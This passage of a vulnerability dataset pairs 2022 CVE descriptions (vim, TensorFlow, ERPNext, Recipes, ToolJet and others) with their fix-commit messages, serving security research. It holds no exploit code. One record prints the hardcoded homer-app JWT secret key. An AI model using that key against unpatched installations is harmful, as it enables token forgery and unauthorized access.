Visual mode when closing a window.", "cve_id": "CVE-2022-2284", "source": "cvefixes", "timestamp": ""} {"id": "1dafca4e0b120e08ae6f", "text": "CVE: CVE-2022-22845\n\n[{'lang': 'en', 'value': \"QXIP SIPCAPTURE homer-app before 1.4.28 for HOMER 7.x has the same 167f0db2-f83e-4baa-9736-d56064a5b415 JWT secret key across different customers' installations.\"}]\n\nFix commit: added jwt generator.\n\nMany thanks to Omri Baso and Fabien Aunay for the report! Great job guys!", "cve_id": "CVE-2022-22845", "source": "cvefixes", "timestamp": ""} {"id": "bd919786a3e08ffeedc2", "text": "CVE: CVE-2022-2285\n\n[{'lang': 'en', 'value': 'Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0018: going over the end of the typahead\n\nProblem: Going over the end of the typahead.\nSolution: Put a NUL after the typeahead.", "cve_id": "CVE-2022-2285", "source": "cvefixes", "timestamp": ""} {"id": "e1cd0bc1ac049cfc1f20", "text": "CVE: CVE-2022-22851\n\n[{'lang': 'en', 'value': \"A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodtester Hospital's Patient Records Management System 1.0 via the specialization parameter in doctors.php\"}]\n\nFix commit: Create CVE-2022-22851.md", "cve_id": "CVE-2022-22851", "source": "cvefixes", "timestamp": ""} {"id": "e23ecac0c93e4c819c7e", "text": "CVE: CVE-2022-2286\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0020: with some completion reading past end of string\n\nProblem: With some completion reading past end of string.\nSolution: Check the length of the string.", "cve_id": "CVE-2022-2286", "source": "cvefixes", "timestamp": ""} {"id": "47efc956818ef69c8a86", "text": "CVE: CVE-2022-2287\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0021: invalid memory access when adding word to spell word list\n\nProblem: Invalid memory access when adding word with a control character to\n the internal spell word list.\nSolution: Disallow adding a word with control characters or a trailing\n slash.", "cve_id": "CVE-2022-2287", "source": "cvefixes", "timestamp": ""} {"id": "e4bdca099c7d27e85d5f", "text": "CVE: CVE-2022-2288\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0025: accessing beyond allocated memory with the cmdline window\n\nProblem: Accessing beyond allocated memory when using the cmdline window in\n Ex mode.\nSolution: Use \"*\" instead of \"'<,'>\" for Visual mode.", "cve_id": "CVE-2022-2288", "source": "cvefixes", "timestamp": ""} {"id": "1062dfb33f1d534ea9d5", "text": "CVE: CVE-2022-2289\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0026: accessing freed memory with diff put\n\nProblem: Accessing freed memory with diff put.\nSolution: Bail out when diff pointer is no longer valid.", "cve_id": "CVE-2022-2289", "source": "cvefixes", "timestamp": ""} {"id": "d2e971fa9ff9f11662de", "text": "CVE: CVE-2022-2290\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.'}]\n\nFix commit: set correct content type for error messages", "cve_id": "CVE-2022-2290", "source": "cvefixes", "timestamp": ""} {"id": "6331fe3b525011aa8c73", "text": "CVE: CVE-2022-2300\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.19.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2300", "source": "cvefixes", "timestamp": ""} {"id": "2b5f5bbc1559a29e1b95", "text": "CVE: CVE-2022-2301\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository hpjansson/chafa prior to 1.10.3.'}]\n\nFix commit: XwdLoader: Fix buffer over-read and improve general robustness\n\nThis commit fixes a buffer over-read that could occur due to g_ntohl()\nevaluating its argument more than once if at least one of the following\nis true:\n\n* Build target is not x86.\n* __OPTIMIZE__ is not set during compilation (e.g. -O0 was used).\n\nIt also improves robustness more generally and fixes an ", "cve_id": "CVE-2022-2301", "source": "cvefixes", "timestamp": ""} {"id": "1eee67e56de96578b9f1", "text": "CVE: CVE-2022-2304\n\n[{'lang': 'en', 'value': 'Stack-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0035: spell dump may go beyond end of an array\n\nProblem: Spell dump may go beyond end of an array.\nSolution: Limit the word length.", "cve_id": "CVE-2022-2304", "source": "cvefixes", "timestamp": ""} {"id": "4427b21778132b7019f3", "text": "CVE: CVE-2022-23057\n\n[{'lang': 'en', 'value': 'In ERPNext, versions v12.0.9--v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.'}]\n\nFix commit: feat: frappe.whitelist for class methods", "cve_id": "CVE-2022-23057", "source": "cvefixes", "timestamp": ""} {"id": "a27e188d5a62aa82cf58", "text": "CVE: CVE-2022-23058\n\n[{'lang': 'en', 'value': 'ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to full account takeover.'}]\n\nFix commit: feat: frappe.whitelist for class methods", "cve_id": "CVE-2022-23058", "source": "cvefixes", "timestamp": ""} {"id": "fdf9f224210172a24bb1", "text": "CVE: CVE-2022-23059\n\n[{'lang': 'en', 'value': 'A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0 via the “Manage Images” tab, which allows an attacker to upload a SVG file containing malicious JavaScript code.'}]\n\nFix commit: working version 3.0.alpha", "cve_id": "CVE-2022-23059", "source": "cvefixes", "timestamp": ""} {"id": "943f223373cebca75855", "text": "CVE: CVE-2022-2306\n\n[{'lang': 'en', 'value': 'Old session tokens can be used to authenticate to the application and send authenticated requests.'}]\n\nFix commit: Correctly console session token on all logouts. (#875)", "cve_id": "CVE-2022-2306", "source": "cvefixes", "timestamp": ""} {"id": "8fa91f8a217b71b5ce93", "text": "CVE: CVE-2022-23060\n\n[{'lang': 'en', 'value': 'A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0, where a privileged user (attacker) can inject malicious JavaScript in the filename under the “Manage files” tab'}]\n\nFix commit: working version 3.0.alpha", "cve_id": "CVE-2022-23060", "source": "cvefixes", "timestamp": ""} {"id": "335f3deaa12e20e7e724", "text": "CVE: CVE-2022-23061\n\n[{'lang': 'en', 'value': 'In Shopizer versions 2.0 to 2.17.0 a regular admin can permanently delete a superadmin (although this cannot happen according to the documentation) via Insecure Direct Object Reference (IDOR) vulnerability.'}]\n\nFix commit: working version 3.0.alpha", "cve_id": "CVE-2022-23061", "source": "cvefixes", "timestamp": ""} {"id": "b0e3a18a4a78683877f0", "text": "CVE: CVE-2022-23064\n\n[{'lang': 'en', 'value': 'In Snipe-IT, versions v3.0-alpha to v5.3.7 are vulnerable to Host Header Injection. By sending a specially crafted host header in the reset password request, it is possible to send password reset links to users which once clicked lead to an attacker controlled server and thus leading to password reset token leak. This leads to account take over.'}]\n\nFix commit: Force UrlGenerator's Root URL to be the base of APP_URL unless overriden\n(For v5)", "cve_id": "CVE-2022-23064", "source": "cvefixes", "timestamp": ""} {"id": "568c69fa6f262439282c", "text": "CVE: CVE-2022-23065\n\n[{'lang': 'en', 'value': 'In Vendure versions 0.1.0-alpha.2 to 1.5.1 are affected by Stored XSS vulnerability, where an attacker having catalog permission can upload a SVG file that contains malicious JavaScript into the “Assets” tab. The uploaded file will affect administrators as well as regular users.'}]\n\nFix commit: fix(asset-server-plugin): Fix svg XSS vulnerability\n\nIt was discovered that a malicious SVG file containing javascript could be executed when opening the\nsou", "cve_id": "CVE-2022-23065", "source": "cvefixes", "timestamp": ""} {"id": "90f5bcbfed6c024300a3", "text": "CVE: CVE-2022-23066\n\n[{'lang': 'en', 'value': 'In Solana rBPF versions 0.2.26 and 0.2.27 are affected by Incorrect Calculation which is caused by improper implementation of sdiv instruction. This can lead to the wrong execution path, resulting in huge loss in specific cases. For example, the result of a sdiv instruction may decide whether to transfer tokens or not. The vulnerability affects both integrity and may cause serious availability problems.'}]\n\nFix commit: jit: sign-extend the quotient ", "cve_id": "CVE-2022-23066", "source": "cvefixes", "timestamp": ""} {"id": "30118d590c57509a34a7", "text": "CVE: CVE-2022-23067\n\n[{'lang': 'en', 'value': 'ToolJet versions v0.5.0 to v1.2.2 are vulnerable to token leakage via Referer header that leads to account takeover . If the user opens the invite link/signup link and then clicks on any external links within the page, it leaks the password set token/signup token in the referer header. Using these tokens the attacker can access the user’s account.'}]\n\nFix commit: Fix token present in referrer header (#2413)", "cve_id": "CVE-2022-23067", "source": "cvefixes", "timestamp": ""} {"id": "e897fd9abc0dc6392987", "text": "CVE: CVE-2022-23068\n\n[{'lang': 'en', 'value': 'ToolJet versions v0.6.0 to v1.10.2 are vulnerable to HTML injection where an attacker can inject malicious code inside the first name and last name field while inviting a new user which will be reflected in the invitational e-mail.'}]\n\nFix commit: Feature: Add data transfer object layer to validate and sanitize user inputs (#2694)\n\n* add sanitize-html to be used with dto\r\n\r\n* add dto for controllers\r\n\r\n* add vaalidation to check token not empty\r\n\r\n*", "cve_id": "CVE-2022-23068", "source": "cvefixes", "timestamp": ""} {"id": "b468f61426eb6192e045", "text": "CVE: CVE-2022-23071\n\n[{'lang': 'en', 'value': 'In Recipes, versions 0.9.1 through 1.2.5 are vulnerable to Server Side Request Forgery (SSRF), in the “Import Recipe” functionality. When an attacker enters the localhost URL, a low privileged attacker can access/read the internal file system to access sensitive information.'}]\n\nFix commit: added url validation to all server requests", "cve_id": "CVE-2022-23071", "source": "cvefixes", "timestamp": ""} {"id": "0ee58835c8635c1e6aec", "text": "CVE: CVE-2022-23072\n\n[{'lang': 'en', 'value': \"In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.\"}]\n\nFix commit: improved outpu", "cve_id": "CVE-2022-23072", "source": "cvefixes", "timestamp": ""} {"id": "9079494316fa40baa6fd", "text": "CVE: CVE-2022-23073\n\n[{'lang': 'en', 'value': \"In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.\"}]\n\nFix commit: improved output sanit", "cve_id": "CVE-2022-23073", "source": "cvefixes", "timestamp": ""} {"id": "b5da779676df3d462ce8", "text": "CVE: CVE-2022-23074\n\n[{'lang': 'en', 'value': \"In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.\"}]\n\nFix commit: improved output sanitization of several views", "cve_id": "CVE-2022-23074", "source": "cvefixes", "timestamp": ""} {"id": "68c410f2a3a646932644", "text": "CVE: CVE-2022-23077\n\n[{'lang': 'en', 'value': 'In habitica versions v4.119.0 through v4.232.2 are vulnerable to DOM XSS via the login page.'}]\n\nFix commit: fix(login): catch double-slash exploit", "cve_id": "CVE-2022-23077", "source": "cvefixes", "timestamp": ""} {"id": "21d371eb54e7d45aecd9", "text": "CVE: CVE-2022-23078\n\n[{'lang': 'en', 'value': 'In habitica versions v4.119.0 through v4.232.2 are vulnerable to open redirect via the login page.'}]\n\nFix commit: fix(login): catch double-slash exploit", "cve_id": "CVE-2022-23078", "source": "cvefixes", "timestamp": ""} {"id": "96b54fd6a51dbd60a4b7", "text": "CVE: CVE-2022-23079\n\n[{'lang': 'en', 'value': 'In motor-admin versions 0.0.1 through 0.2.56 are vulnerable to host header injection in the password reset functionality where malicious actor can send fake password reset email to arbitrary victim.'}]\n\nFix commit: do not use request host in for devise", "cve_id": "CVE-2022-23079", "source": "cvefixes", "timestamp": ""} {"id": "5ae074b93debd9c62101", "text": "CVE: CVE-2022-23080\n\n[{'lang': 'en', 'value': 'In directus versions v9.0.0-beta.2 through 9.6.0 are vulnerable to server-side request forgery (SSRF) in the media upload functionality which allows a low privileged user to perform internal network port scans.'}]\n\nFix commit: Add support for import ip deny list (#12025)\n\n* Add support for import ip deny list\r\n\r\n* Fix typo", "cve_id": "CVE-2022-23080", "source": "cvefixes", "timestamp": ""} {"id": "efc7ab2184c16deb14aa", "text": "CVE: CVE-2022-23082\n\n[{'lang': 'en', 'value': 'In CureKit versions v1.0.1 through v1.1.3 are vulnerable to path traversal as the function isFileOutsideDir fails to sanitize the user input which may lead to path traversal.'}]\n\nFix commit: Merge pull request from GHSA-fvf5-grm7-538p\n\nCureKit-ghsa-fvf5-grm7-538p adding trailing separator to base dir if …", "cve_id": "CVE-2022-23082", "source": "cvefixes", "timestamp": ""} {"id": "14ce0cac3c8802d7f217", "text": "CVE: CVE-2022-2309\n\n[{'lang': 'en', 'value': \"NULL Pointer Dereference allows attackers to cause a denial of service (or application crash). This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not affected. It allows triggering crashes through forged input data, given a vulnerable code sequence in the application. The vulnerability is caused by the iterwalk function (also used by the canonicalize function). Such code shouldn't be in wide", "cve_id": "CVE-2022-2309", "source": "cvefixes", "timestamp": ""} {"id": "d45d6ddd702401971be6", "text": "CVE: CVE-2022-23126\n\n[{'lang': 'en', 'value': 'TeslaMate before 1.25.1 (when using the default Docker configuration) allows attackers to open doors of Tesla vehicles, start Keyless Driving, and interfere with vehicle operation en route. This occurs because an attacker can leverage Grafana login access to obtain a token for Tesla API calls.'}]\n\nFix commit: Disable anonymous login to Grafana", "cve_id": "CVE-2022-23126", "source": "cvefixes", "timestamp": ""} {"id": "9b93983958079e0ce678", "text": "CVE: CVE-2022-2318\n\n[{'lang': 'en', 'value': 'There are use-after-free vulnerabilities caused by timer handler in net/rose/rose_timer.c of linux that allow attackers to crash linux kernel without any privileges.'}]\n\nFix commit: net: rose: fix UAF bugs caused by timer handler\n\nThere are UAF bugs in rose_heartbeat_expiry(), rose_timer_expiry()\nand rose_idletimer_expiry(). The root cause is that del_timer()\ncould not stop the timer handler that is running and the refcount\nof sock is not managed pro", "cve_id": "CVE-2022-2318", "source": "cvefixes", "timestamp": ""} {"id": "405d9fbf019d86d42c7f", "text": "CVE: CVE-2022-2321\n\n[{'lang': 'en', 'value': 'Improper Restriction of Excessive Authentication Attempts in GitHub repository heroiclabs/nakama prior to 3.13.0. This results in login brute-force attacks.'}]\n\nFix commit: Better limit for unsuccessful login attempts on the devconsole. (#878)", "cve_id": "CVE-2022-2321", "source": "cvefixes", "timestamp": ""} {"id": "fc5c14940986552f4cf0", "text": "CVE: CVE-2022-23220\n\n[{'lang': 'en', 'value': 'USBView 2.1 before 2.2 allows some local users (e.g., ones logged in via SSH) to execute arbitrary code as root because certain Polkit settings (e.g., allow_any=yes) for pkexec disable the authentication requirement. Code execution can, for example, use the --gtk-module option. This affects Ubuntu, Debian, and Gentoo.'}]\n\nFix commit: org.freedesktop.pkexec.usbview.policy: fix a local root privilege escalation issue via pkexec (CVE-2022-23220).\n\nThe ", "cve_id": "CVE-2022-23220", "source": "cvefixes", "timestamp": ""} {"id": "5bdebcd4e370833ecc72", "text": "CVE: CVE-2022-23308\n\n[{'lang': 'en', 'value': 'valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes.'}]\n\nFix commit: [CVE-2022-23308] Use-after-free of ID and IDREF attributes\n\nIf a document is parsed with XML_PARSE_DTDVALID and without\nXML_PARSE_NOENT, the value of ID attributes has to be normalized after\npotentially expanding entities in xmlRemoveID. Otherwise, later calls\nto xmlGetID can return a pointer to previously freed memory.\n\nID attributes which are empty or", "cve_id": "CVE-2022-23308", "source": "cvefixes", "timestamp": ""} {"id": "eb3926aad6313695dd0d", "text": "CVE: CVE-2022-2339\n\n[{'lang': 'en', 'value': \"With this SSRF vulnerability, an attacker can reach internal addresses to make a request as the server and read it's contents. This attack can lead to leak of sensitive information.\"}]\n\nFix commit: Merge pull request #2495 from nocodb/develop\n\nPre-release 0.92.0", "cve_id": "CVE-2022-2339", "source": "cvefixes", "timestamp": ""} {"id": "1075aa0df07a2c38d916", "text": "CVE: CVE-2022-2342\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository outline/outline prior to v0.64.4.'}]\n\nFix commit: 0.64.4", "cve_id": "CVE-2022-2342", "source": "cvefixes", "timestamp": ""} {"id": "0cc8edb011b5c1617b4f", "text": "CVE: CVE-2022-2343\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0044.'}]\n\nFix commit: patch 9.0.0045: reading past end of completion with a long line\n\nProblem: Reading past end of completion with a long line and 'infercase'\n set.\nSolution: Allocate the string if needed.", "cve_id": "CVE-2022-2343", "source": "cvefixes", "timestamp": ""} {"id": "5b4644147fdd23ff4257", "text": "CVE: CVE-2022-2344\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0045.'}]\n\nFix commit: patch 9.0.0046: reading past end of completion with duplicate match\n\nProblem: Reading past end of completion with duplicate match.\nSolution: Check string length", "cve_id": "CVE-2022-2344", "source": "cvefixes", "timestamp": ""} {"id": "1d25226f3ae4dcebe02f", "text": "CVE: CVE-2022-2345\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0046.'}]\n\nFix commit: patch 9.0.0047: using freed memory with recursive substitute\n\nProblem: Using freed memory with recursive substitute.\nSolution: Always make a copy for reg_prev_sub.", "cve_id": "CVE-2022-2345", "source": "cvefixes", "timestamp": ""} {"id": "35bda27b863a0f98c6f5", "text": "CVE: CVE-2022-2353\n\n[{'lang': 'en', 'value': 'Prior to microweber/microweber v1.2.20, due to improper neutralization of input, an attacker can steal tokens to perform cross-site request forgery, fetch contents from same-site and redirect a user.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2353", "source": "cvefixes", "timestamp": ""} {"id": "1f439fcf789dfc679b79", "text": "CVE: CVE-2022-23557\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would trigger a division by zero in `BiasAndClamp` implementation. There is no check that the `bias_size` is non zero. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: [lite] Add check fo", "cve_id": "CVE-2022-23557", "source": "cvefixes", "timestamp": ""} {"id": "50709744c91d70d1b513", "text": "CVE: CVE-2022-23558\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause an integer overflow in `TfLiteIntArrayCreate`. The `TfLiteIntArrayGetSizeInBytes` returns an `int` instead of a `size_t. An attacker can control model inputs such that `computed_size` overflows the size of `int` datatype. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3,", "cve_id": "CVE-2022-23558", "source": "cvefixes", "timestamp": ""} {"id": "50c030e04ee24e3681b0", "text": "CVE: CVE-2022-23559\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause an integer overflow in embedding lookup operations. Both `embedding_size` and `lookup_size` are products of values provided by the user. Hence, a malicious user could trigger overflows in the multiplication. In certain scenarios, this can then result in heap OOB read/write. Users are advised to upgrade to a patched version.'}]\n\nFix commit: ", "cve_id": "CVE-2022-23559", "source": "cvefixes", "timestamp": ""} {"id": "97dba156728e58bfac1a", "text": "CVE: CVE-2022-23560\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would allow limited reads and writes outside of arrays in TFLite. This exploits missing validation in the conversion from sparse tensors to dense tensors. The fix is included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. User", "cve_id": "CVE-2022-23560", "source": "cvefixes", "timestamp": ""} {"id": "5183635d4a54a6b31356", "text": "CVE: CVE-2022-23561\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can craft a TFLite model that would cause a write outside of bounds of an array in TFLite. In fact, the attacker can override the linked list used by the memory allocator. This can be leveraged for an arbitrary write primitive under certain conditions. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and Tensor", "cve_id": "CVE-2022-23561", "source": "cvefixes", "timestamp": ""} {"id": "223ff64b44cf5dda9518", "text": "CVE: CVE-2022-23562\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `Range` suffers from integer overflows. These can trigger undefined behavior or, in some scenarios, extremely large allocations. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Merge pull request #52707 fro", "cve_id": "CVE-2022-23562", "source": "cvefixes", "timestamp": ""} {"id": "d8ce49ac5695e6fd13a4", "text": "CVE: CVE-2022-23564\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. When decoding a resource handle tensor from protobuf, a TensorFlow process can encounter cases where a `CHECK` assertion is invalidated based on user controlled arguments. This allows attackers to cause denial of services in TensorFlow processes. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as the", "cve_id": "CVE-2022-23564", "source": "cvefixes", "timestamp": ""} {"id": "fdf46962ecdf1feafab1", "text": "CVE: CVE-2022-23565\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. An attacker can trigger denial of service via assertion failure by altering a `SavedModel` on disk such that `AttrDef`s of some operation are duplicated. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Remove a `DCHECK`-fail, lo", "cve_id": "CVE-2022-23565", "source": "cvefixes", "timestamp": ""} {"id": "4920220dbeaf9b63a9a5", "text": "CVE: CVE-2022-23566\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. TensorFlow is vulnerable to a heap OOB write in `Grappler`. The `set_output` function writes to an array at the specified index. Hence, this gives a malicious user a write primitive. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commi", "cve_id": "CVE-2022-23566", "source": "cvefixes", "timestamp": ""} {"id": "74eca5b53db864ad0c64", "text": "CVE: CVE-2022-23567\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementations of `Sparse*Cwise*` ops are vulnerable to integer overflows. These can be used to trigger large allocations (so, OOM based denial of service) or `CHECK`-fails when building new `TensorShape` objects (so, assert failures based denial of service). We are missing some validation on the shapes of the input tensors as well as directly constructing a large `TensorShape` with user-", "cve_id": "CVE-2022-23567", "source": "cvefixes", "timestamp": ""} {"id": "de43c459b253c1a81511", "text": "CVE: CVE-2022-23568\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `AddManySparseToTensorsMap` is vulnerable to an integer overflow which results in a `CHECK`-fail when building new `TensorShape` objects (so, an assert failure based denial of service). We are missing some validation on the shapes of the input tensors as well as directly constructing a large `TensorShape` with user-provided dimensions. The fix will be included in TensorFl", "cve_id": "CVE-2022-23568", "source": "cvefixes", "timestamp": ""} {"id": "188e046ee3d60717bcba", "text": "CVE: CVE-2022-23570\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. When decoding a tensor from protobuf, TensorFlow might do a null-dereference if attributes of some mutable arguments to some operations are missing from the proto. This is guarded by a `DCHECK`. However, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the dereferencing of the null pointer, whereas in the second case it ", "cve_id": "CVE-2022-23570", "source": "cvefixes", "timestamp": ""} {"id": "a61327a27a7f0b6c4b32", "text": "CVE: CVE-2022-23571\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. When decoding a tensor from protobuf, a TensorFlow process can encounter cases where a `CHECK` assertion is invalidated based on user controlled arguments, if the tensors have an invalid `dtype` and 0 elements or an invalid shape. This allows attackers to cause denial of services in TensorFlow processes. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on Tenso", "cve_id": "CVE-2022-23571", "source": "cvefixes", "timestamp": ""} {"id": "d873e2bd722dc47b6b00", "text": "CVE: CVE-2022-23572\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, TensorFlow can fail to specialize a type during shape inference. This case is covered by the `DCHECK` function however, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the `ValueOrDie` line. This results in an assertion failure as `ret` contains an error `Status`, not a value. In the second case", "cve_id": "CVE-2022-23572", "source": "cvefixes", "timestamp": ""} {"id": "6d2fc377bedd4521d7ec", "text": "CVE: CVE-2022-23573\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `AssignOp` can result in copying uninitialized data to a new tensor. This later results in undefined behavior. The implementation has a check that the left hand side of the assignment is initialized (to minimize number of allocations), but does not check that the right hand side is also initialized. The fix will be included in TensorFlow 2.8.0. We will also cherrypick thi", "cve_id": "CVE-2022-23573", "source": "cvefixes", "timestamp": ""} {"id": "a89ac02fbead6c30fe84", "text": "CVE: CVE-2022-23574\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. There is a typo in TensorFlow's `SpecializeType` which results in heap OOB read/write. Due to a typo, `arg` is initialized to the `i`th mutable argument in a loop where the loop index is `j`. Hence it is possible to assign to `arg` from outside the vector of arguments. Since this is a mutable proto value, it allows both read and write to outside of bounds data. The fix will be included in Tens", "cve_id": "CVE-2022-23574", "source": "cvefixes", "timestamp": ""} {"id": "a81c850b94a61a3f7e04", "text": "CVE: CVE-2022-23575\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `OpLevelCostEstimator::CalculateTensorSize` is vulnerable to an integer overflow if an attacker can create an operation which would involve a tensor with large enough number of elements. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supp", "cve_id": "CVE-2022-23575", "source": "cvefixes", "timestamp": ""} {"id": "0d82b274e1182d0322a7", "text": "CVE: CVE-2022-23576\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `OpLevelCostEstimator::CalculateOutputSize` is vulnerable to an integer overflow if an attacker can create an operation which would involve tensors with large enough number of elements. We can have a large enough number of dimensions in `output_shape.dim()` or just a small number of dimensions being large enough to cause an overflow in the multiplication. The fix will be ", "cve_id": "CVE-2022-23576", "source": "cvefixes", "timestamp": ""} {"id": "bcc8ac641fd9dd1baf7c", "text": "CVE: CVE-2022-23577\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `GetInitOp` is vulnerable to a crash caused by dereferencing a null pointer. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent null dereference read in `GetInitOp`.\n\nWe have a map of maps. We test tha", "cve_id": "CVE-2022-23577", "source": "cvefixes", "timestamp": ""} {"id": "4f43cb327ee0cd705917", "text": "CVE: CVE-2022-23578\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. If a graph node is invalid, TensorFlow can leak memory in the implementation of `ImmutableExecutorState::Initialize`. Here, we set `item->kernel` to `nullptr` but it is a simple `OpKernel*` pointer so the memory that was previously allocated to it would leak. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow ", "cve_id": "CVE-2022-23578", "source": "cvefixes", "timestamp": ""} {"id": "b2944ae389334d812f32", "text": "CVE: CVE-2022-23579\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `SafeToRemoveIdentity` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent a ", "cve_id": "CVE-2022-23579", "source": "cvefixes", "timestamp": ""} {"id": "0506e16e83ec5da35dbc", "text": "CVE: CVE-2022-23580\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. During shape inference, TensorFlow can allocate a large vector based on a value from a tensor controlled by the user. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 